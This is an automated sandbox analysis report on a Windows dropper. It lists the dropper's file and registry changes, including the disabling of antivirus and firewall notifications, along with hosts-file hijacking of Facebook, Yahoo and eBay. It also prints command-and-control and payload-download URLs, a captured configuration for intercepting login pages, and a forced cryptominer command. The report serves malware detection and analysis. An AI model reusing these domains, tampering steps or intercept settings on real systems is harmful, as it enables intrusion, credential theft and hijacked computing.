Gen.Variant.Symmi.25089_5dfa5d358a
Susp_Dropper (Kaspersky), Gen:Variant.Symmi.25089 (B) (Emsisoft), Gen:Variant.Symmi.25089 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour:
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 5dfa5d358a593637426b90dc840ff5ed
SHA1: 2ed5f9240d123781ac96215737bd93dc65e58e01
SHA256: f3010a267a5f746aacebe0571b46e8ef88088406eb0b272d853a23a164a93de7
SSDeep: 24576:T6EbKytohDRfCp1CGlaUIzQt7OCOoqcg:hxM97CGsJAo
Size: 817664 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: CodecPerformer
Created at: 2014-04-07 10:25:46
Analyzed on: WindowsXP SP3 32-bit
Summary:
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
ihjbkwa.exe:4288
ihjbkwa.exe:3024
etxfew6ip3cqi.exe:5992
etxfew6hh66qizwomjjb.exe:3416
etxfew6i9qdqi.exe:4436
etxfew6i9qdqi.exe:5568
uucarfjeig.exe:1588
uucarfjeig.exe:4580
etxfew6j1y0qi.exe:2996
%original file name%.exe:556
etxfew6hjveqi.exe:5396
The Malware injects its code into the following process(es):
No processes have been created.
File activity
The process ihjbkwa.exe:4288 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\ansdmhhppztc\tst (10 bytes)
The process ihjbkwa.exe:3024 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%WinDir%\Temp\etxfew6i9qdqi.exe (35 bytes)
%System%\ansdmhhppztc\ihst (228 bytes)
%System%\ansdmhhppztc\por (1 bytes)
%System%\uucarfjeig.exe (5873 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%WinDir%\Temp\etxfew6hjveqi.exe (35 bytes)
%System%\win64drkclient.exe (68472 bytes)
%System%\drivers\etc\hosts (904 bytes)
%WinDir%\Temp\etxfew6iunfqi.exe (1940 bytes)
%System%\ansdmhhppztc\run (10 bytes)
%WinDir%\Temp\etxfew6ip3cqi.exe (5873 bytes)
%System%\ansdmhhppztc\rng (104 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\ansdmhhppztc\cfg (902 bytes)
%WinDir%\Temp\etxfew6j1y0qi.exe (35 bytes)
%System%\ansdmhhppztc\tst (10 bytes)
The Malware deletes the following file(s):
%WinDir%\Temp\etxfew6iunfqi.exe (0 bytes)
%WinDir%\Temp\etxfew6i9qdqi.exe (0 bytes)
%WinDir%\Temp\etxfew6hjveqi.exe (0 bytes)
%WinDir%\Temp\etxfew6j1y0qi.exe (0 bytes)
%WinDir%\Temp\etxfew6ip3cqi.exe (0 bytes)
The process etxfew6ip3cqi.exe:5992 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\ansdmhhppztc\tst (10 bytes)
The process etxfew6hh66qizwomjjb.exe:3416 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\ansdmhhppztc\etc (10 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\ihjbkwa.exe (5873 bytes)
%System%\ansdmhhppztc\tst (10 bytes)
The Malware deletes the following file(s):
%System%\drivers\etc\hosts (0 bytes)
The process uucarfjeig.exe:1588 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\ansdmhhppztc\tst (10 bytes)
The process uucarfjeig.exe:4580 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\ansdmhhppztc\tst (10 bytes)
The process %original file name%.exe:556 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\etxfew6hh66qizwomjjb.exe (3890 bytes)
%System%\ansdmhhppztc\tst (10 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\etxfew6hh66qizwomjjb.exe (0 bytes)
Registry activity
The process ihjbkwa.exe:3024 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E EB 07 22 0B CA 9C D4 C7 34 F5 8D 5E A7 87 87"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%System%\config\systemprofile\Application Data"
[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Malware deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process etxfew6ip3cqi.exe:5992 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 DA 7A 87 AF 3A C2 A1 84 4E F7 A0 C2 6C 37 E8"
The process etxfew6hh66qizwomjjb.exe:3416 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 57 CC 7C 74 63 E2 C2 69 7B 3B 9E 72 C7 59 02"
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Profile Peer Logs Encryption" = "%System%\ihjbkwa.exe"
The process etxfew6i9qdqi.exe:4436 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 9E 9A F3 42 38 4F 3C AD 65 07 E1 7B 07 42 26"
The process etxfew6i9qdqi.exe:5568 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C E8 FC 90 E8 AF 2D B5 8B 77 4B 5B EF B6 E3 8A"
The process etxfew6j1y0qi.exe:2996 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 B3 AD 91 74 7A 62 A1 C1 4E FB 1C 44 38 6F C9"
The process etxfew6hjveqi.exe:5396 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 03 A2 22 DC 4D D6 5E E2 B7 FB F0 F2 51 30 1D"
Dropped PE files
| MD5 | File path |
|---|---|
| 14ff2121eda9993823b5b7e32a6475c9 | c:\WINDOWS\system32\win32drkclient.exe |
| ee117a41ec7d1a8a78ec55ae1d66909a | c:\WINDOWS\system32\win64drkaesent.exe |
| 897914962939e2406d9a25261cf7b604 | c:\WINDOWS\system32\win64drkclient.exe |
HOSTS file anomalies
The Malware modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 804 bytes in size. The following strings are added to the hosts file listed below:
| 127.0.0.1 | www.facebook.com |
| 127.0.0.1 | facebook.com |
| 127.0.0.1 | mail.yahoo.com |
| 127.0.0.1 | my.ebay.com |
| 127.0.0.1 | cgi.ebay.com |
| 127.0.0.1 | offer.ebay.com |
| 127.0.0.1 | feedback.ebay.com |
| 127.0.0.1 | motors.search.ebay.com |
| 127.0.0.1 | search.ebay.com |
| 127.0.0.1 | pages.ebay.com |
| 127.0.0.1 | pages.motors.ebay.com |
| 127.0.0.1 | myworld.ebay.com |
| 127.0.0.1 | motors.listings.ebay.com |
| 127.0.0.1 | cgi1.ebay.com |
| 127.0.0.1 | contact.ebay.com |
| 127.0.0.1 | srx.ebaymotors.ebayrtm.com |
| 127.0.0.1 | motors.shop.ebay.com |
| 127.0.0.1 | forums.ebay.com |
| 127.0.0.1 | answercenter.ebay.com |
| 127.0.0.1 | shop.ebay.com |
| 127.0.0.1 | ocs.ebay.com |
| 127.0.0.1 | cschatlb-na.corp.ebay.com |
| 127.0.0.1 | cschat1-na.corp.ebay.com |
| 127.0.0.1 | cschat.ebay.com |
| 127.0.0.1 | helpdesk.corp.ebay.com |
| 127.0.0.1 | qu.corp.ebay.com |
| 127.0.0.1 | www.ebay.com |
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 636726 | 636928 | 4.70671 | 0719d3c146cb4f1f830df80707d2c501 |
| .rdata | 643072 | 54258 | 54272 | 3.69469 | 3b27c42a13a8f484f591a37bf6751dcb |
| .data | 700416 | 159292 | 125440 | 5.50063 | c2fae4ae7da08179a7165084761c2c88 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://necessarydress.net/forum/search.php?method=validate&mode=sox&v=027&sox=3cd2a600 | |
| hxxp://rememberpaint.net/forum/search.php?method=validate&mode=sox&v=027&sox=3cd2a600 | |
| hxxp://musicsecond.net/forum/search.php?method=validate&mode=sox&v=027&sox=3cd2a600 | |
| hxxp://musicsecond.net/forum/search.php?method=all&flag&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://musicsecond.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://necessarydress.net/dep/win64drkclient.exe | |
| hxxp://musicsecond.net/forum/search.php?method=hostname&host=www.facebook.com&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=3c1f1400&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://necessarydress.net/dep/win32drkclient.exe | |
| hxxp://necessarydress.net/dep/win64drkaesent.exe | |
| hxxp://musicsecond.net/forum/search.php?method=checkport&port=49251&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=3c1f1400&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://musicsecond.net/forum/search.php?method=setvar&key=stopped&value=3c1f1400&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=3c1f1400&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://musicsecond.net/forum/search.php?method=all&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://musicsecond.net/forum/search.php?method=post&type=miner_forced&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://partyorderly.net/dep/win64drkaesent.exe | |
| hxxp://littleappear.net/forum/search.php?method=validate&mode=sox&v=027&sox=3cd2a600 | |
| hxxp://partyorderly.net/dep/win32drkclient.exe | |
| hxxp://partyorderly.net/dep/win64drkclient.exe |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=3c1f1400&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: musicsecond.net
HTTP/1.1 200 OK
Date: Thu, 15 May 2014 13:43:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.28
Connection: close
Content-Type: text/html..........................
GET /forum/search.php?method=all&flag&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: musicsecond.net
HTTP/1.1 200 OK
Date: Thu, 15 May 2014 13:43:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.28
Connection: close
Content-Type: text/htmlping.5.FLAG cfg.220."southblood.net" "watchstand.net" "groupcook.net"
"uponloud.net" "necessarydress.net" "wrongthrew.net" "signarmy.net" "t
ablefruit.net" "littleappear.net" "saltsecond.net" "wifeknew.net" "fro
ntride.net" "lasopeidres.com" var_user_ip.684.%kill_jhminer% = "1";.%i
nvite_cc% = "1";.ºn_contact% = "1";.%live_link% = "hXXp://helpdesk.c
orp.ebay.com/chat.php?id=4094&sess=1d5f0d294193f04c60b901d024035a82&ta
lk=1";.ëaylive% = "partyorderly.net";.%set_intercepts% = ""VVV.faceb
ook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com"
"partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyo
rderly.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net
";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%state
% = "TM";.%cpuinfo% = " Intel(R) Xeon(R) CPU E5-2670 0 @ 2.60GHz (2593
MHz)";.%port% = "25784";.%relay_soxid% = "3c1f1400";.%ip% = "76.109.1
21.231";.%newport% = "49251";.plugin.55070.miner_forced.80.win32drkcli
ent.exe -a X11 -o stratum tcp://"%local server IP%":3388 -u 3cd2a600 -p x.M
Z......................@..............................................
.!..L.!This program cannot be run in DOS mode....$.........lg...4...4.
..4.?y4...4...4...49..4...4...4...4...4...4...4...4...4...4Rich...4...
.............PE..L.....\S.....................N....................@..
......................................................................
.....(................................................................
.......@...............(............................text...H......<<< skipped >>>
GET /forum/search.php?method=all&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: musicsecond.net
HTTP/1.1 20
GET /dep/win64drkaesent.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Thu, 15 May 2014 13:44:06 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 24 Feb 2014 22:08:01 GMT
Accept-Ranges: bytes
Content-Length: 2777088
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d......S
.................. ..\*[email protected]
.......*....... .......................................*.......*..$..
..........'...............*..G.......................... .*.(.........
............*[email protected]..... ....... .........
........`.p`.data......... ....... [email protected]...&....!..(
....!.............@.`@.pdata........'.......'[email protected]@.xdata..
......).......(.............@.@@.bss....`b....*.......................
`..edata........*.......)[email protected]@.idata...$....*..&....).....
[email protected].....*.......*.............@[email protected].....*...
....*.............@.`..reloc...G....*..H....*[email protected]........
......................................................................
......................................................................
.............................................ffffff.........H..(1.f.=.
...MZ.._@*.......Q@*.......C@*.......I@*.....tg....)...K@*...tH......e
. .H........( ...;@*.H...`*.H..u`*.H....*.....- ..=..!..tf1.H..(......
... ......Hc.....H..B...H...:PE..u...J.f....t?f......j............]...
......1.......K...f.H...- ...- .1.H..(..zt...,.........1............H.
.8...?*.D...?*.L....).H....).H....).....).H....).H.D$ .c. .....).H..8.
........AUATUWVSH......D...?*.1......H.T$ E..H...H.......eH..%0...1.H.
X.H.=i.*..........H9...'..........H...H...._*.H..u...._*.1........<<< skipped >>>
GET /dep/win32drkclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Thu, 15 May 2014 13:44:02 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sun, 23 Feb 2014 00:22:10 GMT
Accept-Ranges: bytes
Content-Length: 962048
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...9?.S
.................:....... ...........P....@...........................
......W......... .....................................................
....................................................................`.
...........................text....9.......:..................`.``.dat
a........P.......>[email protected]...`...L...F.........
.....@.`@.bss..................................`..idata...............
[email protected][email protected].... ..
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...................................................&......'.......1.f.
[email protected]..$....
.......$.............N..P.N..T.N..4.N.........=dWM..tm1.......&......$
...........f...<.@[email protected][email protected]?f......j...........
.].........1.......K....v...$..L......1......yt...,.........1.........
..f...,. .N..D$...N..D$...N..D$...N....N..$.N...$..N..D$.........N...,
.........'....U1........WV.U.S....|...0.b...)..D$...........@......@..
....@......@......@......@[email protected]..<<< skipped >>>
GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: musicsecond.net
HTTP/1.1 200 OK
Date: Thu, 15 May 2014 13:43:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.28
Connection: close
Content-Type: text/html.............
GET /forum/search.php?method=validate&mode=sox&v=027&sox=3cd2a600 HTTP/1.0
Accept: */*
Connection: close
Host: necessarydress.net
HTTP/1.0 404 Not Found
Date: Thu, 15 May 2014 13:43:22 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Server: YTS/1.20.28<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 -
Not Found..
GET /forum/search.php?method=validate&mode=sox&v=027&sox=3cd2a600 HTTP/1.0
Accept: */*
Connection: close
Host: musicsecond.net
HTTP/1.1 200 OK
Date: Thu, 15 May 2014 13:43:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.28
Connection: close
Content-Type: text/html304..^uS........musicsecond.net.........=...>]-\....%...B.W........
...Y$......8Lu..,}.o......W.L.....?..6..y|.\q.......QMlk.O.....~..>
.B......kL,.C....q...........-.....a..2.8....4...~V.......T.......UK..
pY.`...Cc..73?3./P..p.-C]...zud.....{.I..V$*1w.-SAatW..`...n?*...h..ku
.o...:.W.@t`.. ?../..A.%.xs...8..d3.....!......r. Y.?......)...st.P.dE
....(.'H6.&..R$WM..a.a\..eqh.%-...|..E>../$......1.W...|..(..#....'
[email protected].)....<I../....|]......9.Nx.x.}b.W0...^......C
D .^d....Q..xO.J(.`..T.&...a. 0J......?:.%Jx.W..`G..5 v...h./.......d.
.$..].......;.....g..L._....>.....H........v.`...6....-s.Z.......P.
..6..X.u.'[email protected].''..&.....X..`......N..i.&..Bj1._..##.............Y@.
c......~0.....Y..J8O..X5..j..w.%~m.an.Z...y}..i.....n\...........('...
.$p.3. :gTL..s.;.y........M..zo>.(}.A.....1.......-.......s..3.g...
.x.........d.......`.Qy..K[-A..'.....9.k....$.:.l-.n...yd.......x5.,.U
m?.{^.............._2...M.......@P..].b.wz6.i....3}.%....._.)G......._
...x.:.{,K.....!'H.Pn...G[S9G.......!qZ||.KV..Vo.miAK.......P......5f0
..U.kr\...6.qHv.. ...K....@.....`J.......|..{.[....k&.ggnV.1..(i}.<
...I.....Lr)..3o..F.[..ww.[..v t..~.20...!9.9 ..?..
GET /dep/win64drkclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Thu, 15 May 2014 13:43:52 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 21 Feb 2014 20:25:42 GMT
Accept-Ranges: bytes
Content-Length: 2785792
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d...K..S
.................. ..~*..V............@..............................@
.....M/ ....... .......................................*.......*..$..
..........(...............*.8I.......................... .*.(.........
............*[email protected]..... ....... .........
........`.p`.data...`..... ....... [email protected]`....!..b
....!.............@.`@.pdata........(.......'[email protected]@.xdata..
<....0).......).............@.@@.bss.....U...0*....................
...`..edata........*.......)[email protected]@.idata...$....*..&....*..
[email protected].....*......4*.............@[email protected].....*
......6*.............@.`..reloc..8I....*..J...8*[email protected].....
......................................................................
......................................................................
................................................ffffff.........H..(1.f
.=....MZ...Z*........Z*........Z*........Z*.....tg....*....Z*...tH....
..uw .H......... ....Z*.H...s*.H...s*.H....*...... ..=(.!..tf1.H..(...
....-w ......Hc.....H..B...H...:PE..u...J.f....t?f......j............]
.........1.......K...f.H.... .... .1.H..(..zt...,.........1...........
.H..8..&Z*.D../Z*.L....*.H....*.H....*.....*.H....*.H.D$ .sv .....*.H.
.8.........AUATUWVSH......D...Y*.1......H.T$ E..H...H.......eH..%0...1
.H.X.H.=i.*..........H9...'..........H...H....r*.H..u....r*.1.....<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=027&sox=3cd2a600 HTTP/1.0
Accept: */*
Connection: close
Host: rememberpaint.net
HTTP/1.1 200 OK
Date: Thu, 15 May 2014 13:43:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2599
Keep-Alive: timeout=5, max=128
Connection: close
Content-Type: text/html; charset=UTF-8<!--...top.location="hXXp://rememberpaint.net/?fp=GNvrr8OFgJYx05oL7
4Y0K+oB9n5gIPxLfRY4O2igXKEbP4mpHaxVPp8EE1mx0x840ifJ81mVJEQvp9tN/X5
QVw==&prvtof=hjCPAVDYsJtvCRM7susEms8GeSM8pyqEiJ/rsGujxD4=&poru
=NO0RNNU0RyZwwKTZj88+hLhSuwlJYjctx0fS7Q8dSmrMVkzyN1dDdJwbTE5OEk7US2r
+eZ540W1wCUHIVIKRUtf02Um833iiRLW1wg6pxGogWGKUTrZ8H6QYd6GGWfH5&cifr=1
&method=validate&mode=sox&v=027&sox=3cd2a600";.../*..-->..<scrip
t type="text/javascript">...<!--...dimensionUpdated = 0;...funct
ion applyFrameKiller()...{....if(window.top != self)....{.....cHeight
= 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non
-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....}
else if( document.documentElement && ( document.documentElement.client
Width || document.documentElement.clientHeight ) ) {.....//IE 6 in '
standards compliant mode'.....cHeight = document.documentElement.clien
tHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( d
ocument.body.clientWidth || document.body.clientHeight ) ) {.....//IE
4 compatible.....cHeight = document.body.clientHeight;.....dimensionUp
dated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1)..
...{......window.top.location = "hXXp://rememberpaint.net/?fp=GNvrr8OF
gJYx05oL74Y0K+oB9n5gIPxLfRY4O2igXKEbP4mpHaxVPp8EE1mx0x840ifJ81mVJEQv
p9tN/X5QVw==&prvtof=6OrhUu5YwI4DHT7hUCQJqGC3sJ3nyHKSmdwcegiVJSo%
3D&poru=evGnqmt2GmkmQbeJ0a52lSv1yjK/94AGflaLxaFM56L1gIvNl4kckElvQfQR
MWBJmDPFqyfepEwVqTzveQBF5VaJJJcNh0T15QkHsrZxhyEgX9aJknLK0PDQn3F2zT<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=027&sox=3cd2a600 HTTP/1.0
Accept: */*
Connection: close
Host: littleappear.net
HTTP/1.0 404 Not Found
Date: Thu, 15 May 2014 13:43:22 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Server: YTS/1.20.28<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 -
Not Found..
GET /forum/search.php?method=setvar&key=stopped&value=3c1f1400&mode=sox&v=027&sox=3cd2a600&lport=1&rsid=3c1f1400&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: musicsecond.net
HTTP/1.1 200 OK
Date: Thu, 15 May 2014 13:44:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.28
Connection: close
Content-Type: text/html.............
The Malware connects to the servers at the folowing location(s):
.text
`.rdata
@.data
Ua%Dw
PSSSh
.oBVf
SSSh`
~PSSShp:@
uDSSSh
SSShP
XK~%f
_W?%f
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
ihjbkwa.exe
qi.exe
Smart Web Counter Removal Brightness User-mode
uucarfjeig.exe
b.BcF
5Z.orpA
8]F%C
Gix.av
X.fv
N=%fu
@j.ti^
zcÁ
%Documents and Settings%\LocalService
|%System%\uucarfjeig.exe
|musicsecond.net
WATCHDOGPROC "c:\windows\system32\ihjbkwa.exe"
%System%\ihjbkwa.exe
mscoree.dll
KERNEL32.DLL
uucarfjeig.exe_4580:
.text
`.rdata
@.data
Ua%Dw
PSSSh
.oBVf
SSSh`
~PSSShp:@
uDSSSh
SSShP
XK~%f
_W?%f
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
ihjbkwa.exe
qi.exe
Smart Web Counter Removal Brightness User-mode
uucarfjeig.exe
b.BcF
5Z.orpA
8]F%C
Gix.av
X.fv
N=%fu
@j.ti^
zcÁ
%Documents and Settings%\LocalService
%System%\uucarfjeig.exe
mscoree.dll
KERNEL32.DLL
etxfew6ip3cqi.exe_5992:
.text
`.rdata
@.data
Ua%Dw
PSSSh
.oBVf
SSSh`
~PSSShp:@
uDSSSh
SSShP
XK~%f
_W?%f
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
ihjbkwa.exe
qi.exe
Smart Web Counter Removal Brightness User-mode
uucarfjeig.exe
b.BcF
5Z.orpA
8]F%C
Gix.av
X.fv
N=%fu
@j.ti^
zcÁ
%Documents and Settings%\LocalService
%WinDir%\TEMP\etxfew6ip3cqi.exe
mscoree.dll
KERNEL32.DLL
win32drkclient.exe_1760:
.text
``.data
.rdata
`@.bss
.idata
\\\\5\\\\
|$@3\$,3\$0
\$$!|$$!
|$ 1|$41
\$0#\$(1
|$\3|$81
\$\3\$`3
""""%""""1
1|$,1\$,
\$\3\$ 1|$(
\$43\$01
\$ 3\$41
1\$,1|$,
\$ 3\$(3\$8
|$03|$43|$@
|$,3|$83|$ 3|$
libgcj-13.dll
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
cpuminer 2.3.2
DEBUG: job_id='%s' extranonce2=%s ntime=x
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
